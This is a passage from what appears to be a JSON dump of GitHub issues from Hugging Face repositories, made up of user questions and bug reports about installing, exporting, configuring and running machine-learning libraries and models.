"created_at": "2024-02-29T12:44:20Z", "updated_at": "2025-01-01T11:54:48Z", "comments": 1, "user": "lordsoffallen" }, { "repo": "huggingface/text-generation-inference", "number": 1615, "title": "How to use the grammar support feature?", "body": "### Feature request\n\n![image](https://github.com/huggingface/text-generation-inference/assets/126798556/74279ba2-3df8-4abd-8b7b-5459a5f209ec)\r\n\r\nCan you please clarify how we can use this? what is it for?\n\n### Motivation\n\n![image](https://github.com/huggingface/text-generation-inference/assets/126798556/74279ba2-3df8-4abd-8b7b-5459a5f209ec)\r\n\r\nCan you please clarify how we can use this? what is it for?\n\n### Your contribution\n\n![image](https://github.com/huggingface/text-generation-inference/assets/126798556/74279ba2-3df8-4abd-8b7b-5459a5f209ec)\r\n\r\nCan you please clarify how we can use this? what is it for?", "url": "https://github.com/huggingface/text-generation-inference/issues/1615", "state": "closed", "labels": [], "created_at": "2024-02-29T12:35:24Z", "updated_at": "2024-03-04T14:49:39Z", "user": "Stealthwriter" }, { "repo": "huggingface/datasets", "number": 6700, "title": "remove_columns is not in-place but the doc shows it is in-place", "body": "### Describe the bug\r\n\r\nThe doc of `datasets` v2.17.0/v2.17.1 shows that `remove_columns` is in-place. [link](https://huggingface.co/docs/datasets/v2.17.1/en/package_reference/main_classes#datasets.DatasetDict.remove_columns)\r\n\r\nIn the text classification example of transformers v4.38.1, the columns are not removed.\r\nhttps://github.com/huggingface/transformers/blob/a0857740c0e6127485c11476650314df3accc2b6/examples/pytorch/text-classification/run_classification.py#L421\r\n\r\n### Steps to reproduce the bug\r\n\r\nhttps://github.com/huggingface/transformers/blob/a0857740c0e6127485c11476650314df3accc2b6/examples/pytorch/text-classification/run_classification.py#L421\r\n\r\n### Expected behavior\r\n\r\nActually remove the columns.\r\n\r\n### Environment info\r\n\r\n1. datasets v2.17.0\r\n2. transformers v4.38.1", "url": "https://github.com/huggingface/datasets/issues/6700", "state": "closed", "labels": [], "created_at": "2024-02-28T12:36:22Z", "updated_at": "2024-04-02T17:15:28Z", "comments": 3, "user": "shelfofclub" }, { "repo": "huggingface/optimum", "number": 1729, "title": "tflite support for gemma ", "body": "### Feature request\n\nAs per the title, is there plans to support gemma in tfilte \n\n### Motivation\n\nnecessary format for current work \n\n### Your contribution\n\nno ", "url": "https://github.com/huggingface/optimum/issues/1729", "state": "closed", "labels": [ "feature-request", "tflite", "Stale" ], "created_at": "2024-02-27T17:15:54Z", "updated_at": "2025-01-19T02:04:34Z", "comments": 2, "user": "Kaya-P" }, { "repo": "huggingface/huggingface_hub", "number": 2051, "title": "How edit cache dir and in bad net download how to redownload with last download point", "body": "OSError: Consistency check failed: file should be of size 1215993967 but has size 118991296 (pytorch_model.bin).\r\nWe are sorry for the inconvenience. Please retry download and pass `force_download=True, resume_download=False` as argument.\r\nIf the issue persists, please let us know by opening an issue on https://github.com/huggingface/huggingface_hub.\r\nDownloading pytorch_model.bin: 10%|\u2588\u2588\u2588\u2588\u258c | 119M/1.22G [06:51<1:03:13, 289kB/s]\r\n\r\nHi , I use this in windows and space C: is not enouth space, I want to set download or install cache dir is in D: ,how to do this.\r\nAnd beacuse I have bad network so it is everytime error in one big file download, and how to download this file in a bad network.", "url": "https://github.com/huggingface/huggingface_hub/issues/2051", "state": "closed", "labels": [], "created_at": "2024-02-27T14:45:10Z", "updated_at": "2024-02-27T15:59:35Z", "user": "caihua" }, { "repo": "huggingface/candle", "number": 1769, "title": "[Question] How to modify Mistral to enable multiple batches?", "body": "Hello everybody,\r\n\r\nI am attempting to implement multiple batches for the Mistral forward pass. However, the `forward` method takes an argument `seqlen_offset` which seems to be specific to the batch. I have attempted to implement it with a `position_ids` tensor in [this](https://github.com/EricLBuehler/mistral.rs/blob/mistralrunner/mistralrs-core/src/models/mistral.rs) file. \r\nSpecifically, I rewrote the rotary embedding function:\r\n```rust\r\nfn apply_rotary_emb_qkv(\r\n &self,\r\n q: &Tensor,\r\n k: &Tensor,\r\n position_ids: &Tensor,\r\n) -> Result<(Tensor, Tensor)> {\r\n let cos = self.cos.i(position_ids)?;\r\n let sin = self.sin.i(position_ids)?;\r\n\r\n let q_embed = (q.broadcast_mul(&cos)? + rotate_half(q)?.broadcast_mul(&sin))?;\r\n let k_embed = (k.broadcast_mul(&cos)? + rotate_half(k)?.broadcast_mul(&sin))?;\r\n Ok((q_embed, k_embed))\r\n}\r\n```\r\nI create the position ids with the following line:\r\n```rust\r\nlet position_ids = Tensor::arange(\r\n past_key_values_length as i64,\r\n (past_key_values_length + seq_len) as i64,\r\n input_ids.device(),\r\n)?;\r\n```\r\nWith `past_key_values_length` as the result of\r\n```rust\r\nfn calculate_past_kv_len(&self, seq_len: usize) -> Result {\r\n let kv_cache_1 = &self.layers.first().as_ref().unwrap().self_attn.kv_cache;\r\n if kv_cache_1.is_none() {\r\n return Ok(0);\r\n }\r\n let k_cache_1 = &kv_cache_1.as_ref().unwrap().0;\r\n if k_cache_1.dims()[0] <= seq_len {\r\n Ok(0)\r\n } else {\r\n let indexed = k_cache_1.i(seq_len)?;\r\n let dims = indexed.dims();\r\n Ok(dims[dims.len() - 2])\r\n }\r\n}\r\n```\r\nMy implementation attempts to follow the [transformers implementation of calculating position ids](https://github.com/huggingface/transformers/blob/main/src/transformers/models/mistral/modeling_mistral.py#L977-L985) and for the [implementation of `apply_rotary_emb_qkv`](https://github.com/huggingface/transformers/blob/5c341d4555ba3e4b656053317e372ebed0c5af37/src/transformers/models/mistral/modeling_mistral.py#L139-L164). However, when I copy and run the candle-examples inference script, with the only change being that I do not pass the `seqlen_offset` variable, it does not produce coherent output. While the model runs, it does not \"work\".\r\n\r\nHow can I implement multiple-batch forward passes? Is there a way to do it using the `seqlen_offset` variable? Thank you for any help.", "url": "https://github.com/huggingface/candle/issues/1769", "state": "closed", "labels": [], "created_at": "2024-02-27T13:18:18Z", "updated_at": "2024-03-01T14:01:21Z", "user": "EricLBuehler" }, { "repo": "huggingface/datatrove", "number": 108, "title": "How to load a dataset with the output a tokenizer?", "body": "I planned to use datatrove to apply my tokenizer so that data is ready to use with nanotron.\r\nI am using DocumentTokenizer[Merger] which produces *.ds and *ds.index binary files, although, from what I understood, nanotron is expecting datasets (with \"input_ids\" keys).\r\nI see that things like ParquetWriter cannot be piped after DocumentTokenizer.\r\n\r\nAm I missing a piece?\r\nAre there some helpers to convert ds files into parquet files (or something loadable with datasets) for a given context size?", "url": "https://github.com/huggingface/datatrove/issues/108", "state": "closed", "labels": [], "created_at": "2024-02-27T08:58:09Z", "updated_at": "2024-05-07T12:33:47Z", "user": "Jeronymous" }, { "repo": "huggingface/chat-ui", "number": 875, "title": "Difficulty configuring multiple instances of the same model with distinct parameters", "body": "I am currently self-deploying an application that requires setting up multiple instances of the same model, each configured with different parameters. For example:\r\n\r\n```\r\nMODELS=`[{\r\n \"name\": \"gpt-4-0125-preview\",\r\n \"displayName\": \"GPT 4\",\r\n \"endpoints\" : [{\r\n \"type\": \"openai\"\r\n }]\r\n},\r\n{\r\n \"name\": \"gpt-4-0125-preview\",\r\n \"displayName\": \"GPT 4 temp 0\",\r\n \"parameters\": {\r\n \"temperature\": 0.0\r\n },\r\n \"endpoints\" : [{\r\n \"type\": \"openai\"\r\n }]\r\n}\r\n]`\r\n```\r\n\r\nThis results in a state which looks like that both models are active simultaneously. \r\n![image](https://github.com/huggingface/chat-ui/assets/99467346/0ed9d506-d413-45b5-b959-92e872875748)\r\n\r\nHowever, in practice, I cannot activate the second model (\"GPT 4 temp 0\"); only \"GPT 4\" is utilized during chat operations. It appears as if the system defaults to the first model instance and ignores subsequent ones with the same model name.\r\n\r\nI tried to distinguish between the models by modifying the `name` field and introducing an `id` field, using the appropriate model identifier. However, this approach resulted in a loss of model reference, indicating that these fields cannot be arbitrarily configured on the client side.\r\n\r\nIs there a recommended approach to deploying two instances of the same model with varying parameters? Any guidance or suggestions on how to achieve this would be greatly appreciated.\r\n\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/875", "state": "open", "labels": [], "created_at": "2024-02-26T10:48:43Z", "updated_at": "2024-02-27T17:28:21Z", "comments": 1, "user": "mmtpo" }, { "repo": "huggingface/optimum-nvidia", "number": 76, "title": "How to install optimum-nvidia properly without building a docker image", "body": "It's quite hard for me to build a docker image, so I started from a docker environment with TensorRT LLM 0.6.1 inside.\r\n\r\nI checked your dockerfile, followed the process, and built TensorRT LLM using (I am using 4090 so that cuda arch is 89):\r\n\r\n```\r\npython3 scripts/build_wheel.py -j --trt_root /usr/local/tensorrt --python_bindings --cuda_architectures=\"89-real\" --clean\r\n```\r\n\r\nAfterwards, I copied the resulting bindings*.so into tensorrt_llm's directory inside the dist-packages dir -- according to the dockerfile. Then I followed it to install nvidia-ammo 0.3, then added the optimum-nvidia dir to python path.\r\n\r\nI also went into optimum-nvidia directory, and ran `pip install -e .`, so that in my environment, when using `pip list | grep optimum` I could get:\r\n\r\n```\r\noptimum 1.17.1\r\noptimum-nvidia 0.1.0b2 /root/autodl-tmp/optimum-nvidia\r\n```\r\nHowever, I still could not import optimum.nvidia properly, while it's okay to `import tensorrt_llm` and `tensorrt_llm.bindings`.\r\n\r\n```\r\n>>> from optimum.nvidia.pipelines import pipeline\r\nTraceback (most recent call last):\r\n File \"\", line 1, in \r\nModuleNotFoundError: No module named 'optimum.nvidia'\r\n>>> \r\n```\r\n\r\nCould someone please help me on how to install optimum nvidia properly without building a new image or pulling from dockerhub?\r\n\r\nThank you!", "url": "https://github.com/huggingface/optimum-nvidia/issues/76", "state": "closed", "labels": [], "created_at": "2024-02-26T05:05:24Z", "updated_at": "2024-03-11T13:36:18Z", "user": "Yuchen-Cao" }, { "repo": "huggingface/diffusers", "number": 7088, "title": "Vague error: `ValueError: With local_files_only set to False, you must first locally save the tokenizer in the following path: 'openai/clip-vit-large-patch14'.` how to fix?", "body": "Trying to convert a .safetensors stable diffusion model to whatever the format is that hugging face requires. It throws a vague nonsequitur of an error:\r\n\r\n`pipe = diffusers.StableDiffusionPipeline.from_single_file(str(aPathlibPath/\"vodkaByFollowfoxAI_v40.safetensors\") )`\r\n\r\n```...\r\n [1241](file:///C:/Users/openSourcerer9000/anaconda3/envs/fuze/lib/site-packages/diffusers/loaders/single_file_utils.py:1241) )\r\n [1242](file:///C:/Users/openSourcerer9000/anaconda3/envs/fuze/lib/site-packages/diffusers/loaders/single_file_utils.py:1242) else:\r\n [1243](file:///C:/Users/openSourcerer9000/anaconda3/envs/fuze/lib/site-packages/diffusers/loaders/single_file_utils.py:1243) return {\"text_encoder\": text_encoder, \"tokenizer\": tokenizer}\r\n\r\nValueError: With local_files_only set to False, you must first locally save the tokenizer in the following path: 'openai/clip-vit-large-patch14'.\r\n```\r\n\r\nWhat tokenizer? What path? Where would I get this file? This script already downloaded something locally, why not download this extra thing as well instead of throwing an error?\r\n\r\nWhen I pass local_files_only=True, it says the SAME thing:\r\n`ValueError: With local_files_only set to True, you must first locally save the tokenizer in the following path: 'openai/clip-vit-large-patch14'.`", "url": "https://github.com/huggingface/diffusers/issues/7088", "state": "closed", "labels": [ "stale", "single_file" ], "created_at": "2024-02-25T15:03:07Z", "updated_at": "2024-09-17T21:56:26Z", "user": "openSourcerer9000" }, { "repo": "huggingface/diffusers", "number": 7085, "title": "how to train controlnet with lora?", "body": "train full controlnet need much resource and time, so how to train controlnet with lora?\r\n", "url": "https://github.com/huggingface/diffusers/issues/7085", "state": "closed", "labels": [ "should-move-to-discussion" ], "created_at": "2024-02-25T06:31:47Z", "updated_at": "2024-03-03T06:38:35Z", "user": "akk-123" }, { "repo": "huggingface/optimum-benchmark", "number": 138, "title": "How to set trt llm backend parameters", "body": "I am trying to run the trt_llama example: https://github.com/huggingface/optimum-benchmark/blob/main/examples/trt_llama.yaml\r\n\r\nIt seems optimem-benchmark will automatically transform the huggingface model to inference engine file then benchmarking its performance. When we use tensorrt llm, there is a model \"build\" process (during which we set some quantization parameters) in order to get the `.engine` file. How can we set these parameters when using optimum benchmark?", "url": "https://github.com/huggingface/optimum-benchmark/issues/138", "state": "closed", "labels": [], "created_at": "2024-02-24T17:12:12Z", "updated_at": "2024-02-27T12:48:44Z", "user": "Yuchen-Cao" }, { "repo": "huggingface/optimum-nvidia", "number": 75, "title": "How to build this environment without docker?", "body": "My computer does not support the use of docker. How do I deploy this environment on my computer?", "url": "https://github.com/huggingface/optimum-nvidia/issues/75", "state": "open", "labels": [], "created_at": "2024-02-24T16:59:37Z", "updated_at": "2024-03-06T13:45:18Z", "user": "lemon-little" }, { "repo": "huggingface/accelerate", "number": 2485, "title": "How to log information into a local logging file?", "body": "### System Info\n\n```Shell\nHi, I want to save a copy of logs to a local file, how to achieve this? Specifically, I want accelerator.log also write information in my local file.\n```\n\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nHi, I want to save a copy of logs to a local file, how to achieve this? Specifically, I want accelerator.log also write information in my local file.\n\n### Expected behavior\n\nHi, I want to save a copy of logs to a local file, how to achieve this? Specifically, I want accelerator.log also write information in my local file.", "url": "https://github.com/huggingface/accelerate/issues/2485", "state": "closed", "labels": [], "created_at": "2024-02-24T07:52:55Z", "updated_at": "2024-04-03T15:06:24Z", "user": "Luciennnnnnn" }, { "repo": "huggingface/optimum-benchmark", "number": 136, "title": "\uff08question\uff09When I use the memory tracking feature on the GPU, I find that my VRAM is reported as 0. Is this normal, and what might be causing it?", "body": "![1](https://github.com/huggingface/optimum-benchmark/assets/89191003/4c1adfad-007b-4ef4-99ff-a43fa0101c00)\r\n", "url": "https://github.com/huggingface/optimum-benchmark/issues/136", "state": "closed", "labels": [], "created_at": "2024-02-24T02:57:49Z", "updated_at": "2024-03-08T16:59:41Z", "user": "WCSY-YG" }, { "repo": "huggingface/optimum", "number": 1716, "title": "Optimum for Jetson Orin Nano", "body": "### System Info\n\n```shell\noptimum version: 1.17.1\r\nplatform: Jetson Orin Nano, Jetpack 6.0\r\nPython: 3.10.13\r\nCUDA: 12.2\n```\n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\n\r\n Here is how I installed.\r\n1. install Pytorch 2.2.0 following https://elinux.org/Jetson_Zoo\r\n2. install onnxruntime-gpu 1.17.0 following following https://elinux.org/Jetson_Zoo\r\n3. install Optimum by using `pip install optimum[onnxruntime-gpu]`\n\n### Expected behavior\n\nThe Optimum installed on my Jetson Orin Nano not support GPU for Jetpack 6.0 and Python 3.10.13.\r\n\r\nCan anybody let me know how to install it?", "url": "https://github.com/huggingface/optimum/issues/1716", "state": "open", "labels": [ "bug" ], "created_at": "2024-02-23T23:22:08Z", "updated_at": "2024-02-26T10:03:59Z", "comments": 1, "user": "JunyiYe" }, { "repo": "huggingface/transformers", "number": 29244, "title": "Google Gemma don't know what 1+1 is equal to\uff1f", "body": "### System Info\r\n\r\n[v4.38.1](https://github.com/huggingface/transformers/releases/tag/v4.38.1)\r\n\r\n### Who can help?\r\n\r\n_No response_\r\n\r\n### Information\r\n\r\n- [X] The official example scripts\r\n- [X] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [ ] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n```\r\n\r\nimport torch\r\nfrom transformers import AutoTokenizer, AutoModelForCausalLM\r\n\r\ntokenizer = AutoTokenizer.from_pretrained(\"./gemma_2B\")\r\nmodel = AutoModelForCausalLM.from_pretrained(\"./gemma_2B\", device_map=\"auto\", torch_dtype=torch.float32)\r\n\r\ninput_text = \"1+1=\uff1f\"\r\ninput_ids = tokenizer(input_text, return_tensors=\"pt\").to(\"cuda\")\r\n\r\noutputs = model.generate(**input_ids,max_length=50)\r\n# print(outputs)\r\nprint(tokenizer.decode(outputs[0]))\r\n\r\n\r\n```\r\n\r\n### Expected behavior\r\n\r\noutput is bellow\r\n\r\n```\r\n1+1=\uff1f\r\n\r\n1+1=\uff1f\r\n\r\n1+1=\uff1f\r\n\r\n1+1=\uff1f\r\n\r\n1+1=\uff1f\r\n\r\n1+1=\uff1f\r\n\r\n1+1=\uff1f\r\n\r\n1+1=\uff1f\r\n\r\n1\r\n```", "url": "https://github.com/huggingface/transformers/issues/29244", "state": "closed", "labels": [], "created_at": "2024-02-23T12:16:17Z", "updated_at": "2024-03-07T10:54:09Z", "user": "zhaoyun0071" }, { "repo": "huggingface/optimum", "number": 1713, "title": "Issue converting owlv2 model to ONNX format", "body": "Hi Team,\r\n\r\nI hope this message finds you well.\r\n\r\nI've been working with the owlv2 model and have encountered an issue while attempting to convert it into ONNX format using the provided command:\r\n`! optimum-cli export onnx -m google/owlv2-base-patch16 --task 'zero-shot-object-detection' --framework 'pt' owlv2_onnx`\r\n\r\nUnfortunately, I'm facing the following error:\r\n\r\n`ValueError: Trying to export a owlv2 model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`.`\r\n\r\nAs I am relatively new to this process, I'm unsure about the necessity and usage of custom ONNX configuration. Could you please provide some guidance on how to address this issue? Any assistance or insights would be greatly appreciated.\r\n\r\nThank you for your attention to this matter.", "url": "https://github.com/huggingface/optimum/issues/1713", "state": "closed", "labels": [ "feature-request", "onnx", "exporters" ], "created_at": "2024-02-23T05:55:23Z", "updated_at": "2025-09-10T23:26:13Z", "comments": 6, "user": "n9s8a" }, { "repo": "huggingface/optimum-benchmark", "number": 135, "title": "How to import and use the quantized model with AutoGPTQ\uff1f", "body": "", "url": "https://github.com/huggingface/optimum-benchmark/issues/135", "state": "closed", "labels": [], "created_at": "2024-02-23T03:13:28Z", "updated_at": "2024-02-23T05:03:06Z", "user": "jhrsya" }, { "repo": "huggingface/optimum", "number": 1710, "title": "Native Support for Gemma", "body": "### System Info\n\n```shell\npython version : 3.10.12\r\noptimum version : built from github\r\nopenvino : 2024.1.0-14548-688c71ce0ed\r\ntransformers : 4.38.1\n```\n\n\n### Who can help?\n\n@JingyaHuang @echarlaix \n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nCurrently there is no support to export gemma, google's new opensource model. \r\n\r\nAfter connecting to huggingface and requesting permission to access the gemma repo\r\n\r\nrunning the following line \r\n`model_ov = OVModelForCausalLM.from_pretrained(\"google/gemma-2b\", export = True)`\r\n\r\nproduces the following error\r\n`\r\nValueError: Trying to export a gemma model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type gemma to be supported natively in the ONNX export.`\r\n\n\n### Expected behavior\n\nExpected behavior is for the line of code to successfully run and such that we can export the IR format of the model as well.", "url": "https://github.com/huggingface/optimum/issues/1710", "state": "closed", "labels": [ "feature-request", "onnx", "exporters" ], "created_at": "2024-02-22T17:15:08Z", "updated_at": "2024-02-28T08:37:36Z", "comments": 5, "user": "Kaya-P" }, { "repo": "huggingface/sentence-transformers", "number": 2499, "title": "how can i save fine_tuned cross-encoder to HF and then download it from HF", "body": "I'm looking for ways to share fine-tuned cross-encoder with my teacher. \r\nCross encoder model does not have native push_to_hub() method. So i decided to use general approach:\r\n\r\n```\r\nfrom transformers import AutoModelForSequenceClassification\r\nimport torch\r\n\r\n# read from disk, model was saved as ft_model.save(\"model/crerankingeval-30e-4000-ms-marco-MiniLM-L-6-v2\")\r\ncross_ft_model = AutoModelForSequenceClassification.from_pretrained(\"model\\\\crerankingeval-30e-4000-ms-marco-MiniLM-L-6-v2\")\r\n# push to hub\r\ncross_ft_model.push_to_hub(\"satyroffrost/crerankingeval-30e-4000-ms-marco-MiniLM-L-6-v2\")\r\n```\r\n\r\nNow model is available on HF. Commit info was like:\r\nCommitInfo(commit_url='https://huggingface.co/satyroffrost/crerankingeval-30e-4000-ms-marco-MiniLM-L-6-v2/commit/d81fe317cb037940e09db256d8a0926e80c358e5', commit_message='Upload BertForSequenceClassification', commit_description='', oid='d81fe317cb037940e09db256d8a0926e80c358e5', pr_url=None, pr_revision=None, pr_num=None)\r\n\r\nthen i decided to ensure the model is workable:\r\n\r\n```\r\ncross_ft_model = CrossEncoder(\"satyroffrost/crerankingeval-30e-4000-ms-marco-MiniLM-L-6-v2\")\r\ncross_ft_model.predict([('SentenceTransformer is well-documented library','but saving crossencoder to HF is a bit tricky')])\r\n```\r\n\r\nand get the error:\r\n\r\n_Traceback (most recent call last):\r\n\r\n Cell In[18], line 1\r\n cross_ft_model = CrossEncoder(\"satyroffrost/crerankingeval-30e-4000-ms-marco-MiniLM-L-6-v2\")\r\n\r\n File ~\\anaconda3\\Lib\\site-packages\\sentence_transformers\\cross_encoder\\CrossEncoder.py:72 in __init__\r\n self.tokenizer = AutoTokenizer.from_pretrained(model_name, **tokenizer_args)\r\n\r\n File ~\\anaconda3\\Lib\\site-packages\\transformers\\models\\auto\\tokenization_auto.py:745 in from_pretrained\r\n return tokenizer_class_fast.from_pretrained(pretrained_model_name_or_path, *inputs, **kwargs)\r\n\r\n File ~\\anaconda3\\Lib\\site-packages\\transformers\\tokenization_utils_base.py:1838 in from_pretrained\r\n raise EnvironmentError(\r\n\r\nOSError: Can't load tokenizer for 'satyroffrost/crerankingeval-30e-4000-ms-marco-MiniLM-L-6-v2'. If you were trying to load it from 'https://huggingface.co/models', make sure you don't have a local directory with the same name. Otherwise, make sure 'satyroffrost/crerankingeval-30e-4000-ms-marco-MiniLM-L-6-v2' is the correct path to a directory containing all relevant files for a BertTokenizerFast tokenizer._\r\n\r\n\r\nI compare local model folder and uploaded HF model files, last ones don't include tokenizer files. Uploaded model don't work on HF too. How can i correctly upload model with tokenizer to HF and the use it from HF like model = CrossEncoder(path_to_hf)?\r\n\r\n", "url": "https://github.com/huggingface/sentence-transformers/issues/2499", "state": "closed", "labels": [ "good first issue" ], "created_at": "2024-02-22T15:29:37Z", "updated_at": "2025-03-25T16:07:25Z", "user": "satyrmipt" }, { "repo": "huggingface/transformers", "number": 29214, "title": "How to get input embeddings from PatchTST with (batch_size, sequence_length, hidden_size) dimensions", "body": "### System Info\n\n-\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nThe following snippet outputs the last hidden state but it has (batch_size, num_channels, num_patches, d_model) dimensions\r\n`inputs = encoder(\r\n past_values=series_list, output_hidden_states=True\r\n ).last_hidden_state`\r\n\r\nHere, series_list has (batch_size, sequence_length, num_input_channels) shape.\r\n\r\nTo incorporate this with [EncoderDecoderModel](https://huggingface.co/docs/transformers/v4.37.2/en/model_doc/encoder-decoder#transformers.EncoderDecoderModel), I want the dimensions of the input embedding to be (batch_size, sequence_length, hidden_size). How do you get that?\r\n\n\n### Expected behavior\n\n-", "url": "https://github.com/huggingface/transformers/issues/29214", "state": "open", "labels": [ "Feature request" ], "created_at": "2024-02-22T14:17:10Z", "updated_at": "2024-03-25T03:56:58Z", "user": "nikhilajoshy" }, { "repo": "huggingface/huggingface_hub", "number": 2039, "title": "How to find out the type of files in the repository", "body": "Hello\r\nIs there an option to determine the type of file in the repository, such as \"Checkpoint\", \"LORA\", \"Textual_Inversion\", etc?\r\n\r\nI didn't know where to ask the question so sorry if I'm wrong.", "url": "https://github.com/huggingface/huggingface_hub/issues/2039", "state": "closed", "labels": [], "created_at": "2024-02-22T01:41:29Z", "updated_at": "2024-03-25T11:39:31Z", "user": "suzukimain" }, { "repo": "huggingface/datasets", "number": 6686, "title": "Question: Is there any way for uploading a large image dataset?", "body": "I am uploading an image dataset like this:\r\n```\r\ndataset = load_dataset(\r\n \"json\",\r\n data_files={\"train\": \"data/custom_dataset/train.json\", \"validation\": \"data/custom_dataset/val.json\"},\r\n)\r\ndataset = dataset.cast_column(\"images\", Sequence(Image()))\r\ndataset.push_to_hub(\"StanfordAIMI/custom_dataset\", max_shard_size=\"1GB\")\r\n```\r\nwhere it takes a long time in the `Map` process. Do you think I can use multi-processing to map all the image data to the memory first? For the `Map()` function, I can set `num_proc`. But for `push_to_hub` and `cast_column`, I can not find it.\r\n\r\nThanks in advance!\r\n\r\nBest,", "url": "https://github.com/huggingface/datasets/issues/6686", "state": "open", "labels": [], "created_at": "2024-02-21T22:07:21Z", "updated_at": "2024-05-02T03:44:59Z", "comments": 1, "user": "zhjohnchan" }, { "repo": "huggingface/accelerate", "number": 2474, "title": "how to turn off fp16 auto_cast?", "body": "i notice that the deepspeed config always set my `auto_cast=True` and this is my data\r\n``` \r\ncompute_environment: LOCAL_MACHINE\r\ndeepspeed_config:\r\n deepspeed_multinode_launcher: standard\r\n gradient_clipping: 1.0\r\n offload_optimizer_device: cpu\r\n offload_param_device: cpu\r\n zero3_offload_param_pin_memory: true\r\n zero3_offload_optimizer_pin_memory: true\r\n zero3_init_flag: true\r\n zero3_save_16bit_model: true\r\n zero_stage: 3\r\n max_live_parameters: 1e9\r\n max_reuse_distance: 1e9\r\n round_robin_gradients: true\r\n deepspeed_hostfile: /opt/tiger/hostfile\r\ndistributed_type: DEEPSPEED\r\nfsdp_config: {}\r\nmain_training_function: main\r\nmixed_precision: fp16\r\nuse_cpu: false\r\n\r\n```\r\n\r\n\r\nthis is my deepspeed log:\r\n``` \r\n[2024-02-21 19:35:40,143] [INFO] [config.py:958:print_user_config] json = {\r\n \"train_batch_size\": 512, \r\n \"train_micro_batch_size_per_gpu\": 64, \r\n \"gradient_accumulation_steps\": 1, \r\n \"zero_optimization\": {\r\n \"stage\": 3, \r\n \"offload_optimizer\": {\r\n \"device\": \"cpu\", \r\n \"nvme_path\": null\r\n }, \r\n \"offload_param\": {\r\n \"device\": \"cpu\", \r\n \"nvme_path\": null\r\n }, \r\n \"stage3_gather_16bit_weights_on_model_save\": true\r\n }, \r\n \"gradient_clipping\": 1.0, \r\n \"steps_per_print\": inf, \r\n \"fp16\": {\r\n \"enabled\": true, \r\n \"auto_cast\": true\r\n }, \r\n \"bf16\": {\r\n \"enabled\": false\r\n }, \r\n \"zero_allow_untested_optimizer\": true\r\n}\r\n```", "url": "https://github.com/huggingface/accelerate/issues/2474", "state": "closed", "labels": [], "created_at": "2024-02-21T11:54:51Z", "updated_at": "2025-02-18T08:53:20Z", "user": "haorannlp" }, { "repo": "huggingface/chat-ui", "number": 852, "title": "what is the difference between \"chat-ui-db\" docker image and \"chat-ui\" docker image?", "body": "I found there are 2 packages in the chat-ui repository: one is chat-ui and the other is chat-ui-db. what is the difference between \"chat-ui-db\" docker image and \"chat-ui\" docker image?\r\n\r\nI've pulled two images from the mirror site: huggingface/text-generation-inference:1.4 and mongo:latest. \r\n\r\nI hope to use the two images( huggingface/text-generation-inference:1.4 and mongo:latest.) and the image of chat-ui or chat-ui-db to implement the local large model Q&A service. What should I do? Should I use \"chat-ui-db\" docker image or Should I use \"chat-ui\" docker image.\r\n\r\nWhat should i do to complete my task of local large model Q&A service? Can anyone give detailed help?\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/852", "state": "closed", "labels": [], "created_at": "2024-02-21T09:31:07Z", "updated_at": "2024-02-23T02:58:03Z", "user": "majestichou" }, { "repo": "huggingface/instruction-tuned-sd", "number": 22, "title": "How to use a custom image for validation ", "body": "Hello,\r\nI tried using a custom image for validation since I'm training it on a custom style i uploaded my val image on hub as the mountain.png but it always gives me error for unidentified also for mountain.png it shows validation summary on wandb but for my val image it shows nothing.\r\nDo i need to change something somewhere also how does it compare the val images for loss do i need to put the style image of original image somewhere ", "url": "https://github.com/huggingface/instruction-tuned-sd/issues/22", "state": "closed", "labels": [], "created_at": "2024-02-21T08:15:30Z", "updated_at": "2024-02-22T05:49:11Z", "user": "roshan2024nar" }, { "repo": "huggingface/gsplat.js", "number": 67, "title": "How to set the background color of the scene", "body": "Hi\uff1a\r\nWant to know how to set the background color of the scene,now it's black", "url": "https://github.com/huggingface/gsplat.js/issues/67", "state": "open", "labels": [], "created_at": "2024-02-21T05:49:33Z", "updated_at": "2024-02-26T09:32:25Z", "user": "jamess922" }, { "repo": "huggingface/gsplat.js", "number": 66, "title": "How to adjust the axis of rotation?", "body": "When the model's z-axis is not perpendicular to the ground plane, the rotation effect may feel unnatural, as is the case with this model: testmodel.splat. \r\n[testmodel.zip](https://github.com/huggingface/gsplat.js/files/14353919/testmodel.zip)\r\n\r\n\r\nI would like to rotate the model along an axis that is perpendicular to the ground. Are there any parameters available to adjust the axis of rotation?", "url": "https://github.com/huggingface/gsplat.js/issues/66", "state": "closed", "labels": [], "created_at": "2024-02-21T04:13:01Z", "updated_at": "2024-02-23T02:37:59Z", "user": "gotoeasy" }, { "repo": "huggingface/sentence-transformers", "number": 2494, "title": "How to get embedding vector when input is tokenized already ", "body": "First, thank you so much for sentence-transformer.\r\n\r\n\r\n\r\nHow to get embedding vector when input is tokenized already? \r\n\r\ni guess sentence-transformer can `.encode(original text)`. \r\n\r\nBut i want to know there is way like `.encode(token_ids )` or `.encode(token_ids, attention_masks)` \r\n\r\n\r\nThis is my background below\r\n\r\n> 